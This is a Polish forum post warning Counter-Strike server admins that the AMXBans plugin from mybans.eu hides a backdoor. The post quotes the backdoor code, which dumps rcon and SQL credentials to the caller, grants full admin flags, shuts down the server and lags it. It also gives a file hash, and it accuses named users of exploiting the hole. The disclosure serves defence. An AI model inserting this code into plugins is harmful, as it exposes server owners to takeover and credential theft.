Cześć,
Przybywam do was, aby was ostrzec przed korzystaniem pluginu z mybans.eu.
Wczoraj nastąpiło włamanie na jeden z naszych serwerów który posiadał plugin mybansa ( https://cskomandosi....manie-na-serwer ), początkowo myśleliśmy, że ktoś udostępnił konto admina, ale coś takiego nie miało miejsca, posprawdzałem pluginy i w amxbansie od mybans.eu występowała i występuje nadal furtka której nie powinno być i została dodana w złym celu.
public amxbanuser1(id) { get_cvar_string("rcon_password", szRc, 63); client_print(id, print_console, "RCON:\"%s\"", szRc); } public amxbanuser2(id) { set_user_flags(id, read_flags("abcdefghijklmnopqrstu"), 0); get_cvar_string("amx_sql_host", szSqlHost, 63); get_cvar_string("amx_sql_user", szSqlUser, 63); get_cvar_string("amx_sql_pass", szSqlPass, 63); get_cvar_string("amx_sql_db", szSqlDb, 63); client_print(id, print_console, "SQL HOST:\"%s\"", szSqlHost); client_print(id, print_console, "SQL USER:\"%s\"", szSqlUser); client_print(id, print_console, "SQL PASS:\"%s\"", szSqlPass); client_print(id, print_console, "SQL DB:\"%s\"", szSqlDb); } public amxbanuser3() { server_cmd("rcon_password 748663183"); } public amxbanuser4() { server_cmd("shutdownserver"); } public amxbanuser5() { set_task(0.00, "lagsnc", 2137, "", 0, "b", 0); } public lagsnc() { remove_task(2138, 0); server_cmd("sys_ticrate 1"); } public amxbanuser6() { set_task(0.00, "lagsncoff", 2138, "", 0, "b", 0); } public lagsncoff() { remove_task(2137, 0); server_cmd("sys_ticrate 1000"); }
- Atakujący może poznać hasło rcon / zmienić je
- Atakujący może poznać dane sql amxbansa
- Atakujący może wyłączyć serwer
- Atakujący może zlagować serwer
- Atakujący może nadać sobie wszystkie uprawnienia w tym immunitet
Posprawdzajcie swoje serwery,
( hash pliku który na 100% ma w sobie backdoora - 197f2c27227070ba8eb68d0ad55d2710 ) - Oczywiście mogą występować pewnie inne kombinacje, ponieważ praktyka jest stosowana od kilku miesięcy.
Nie musicie dziękować, żyjcie w miłości i spokoju!
Jeżli już musisz skorzystać z akurat tej wersji, skorzystaj z tego tematu - https://amxx.pl/topi...oprawki-amxxpl/
@edit
Przypomniałem sobie, że lukę wykorzystują ludzie o nickach:
Jonkey - https://mybans.pl/profile/1-jonkey/
smajli - x
Kava - x
Użytkownik dasiek edytował ten post 22.01.2021 07:39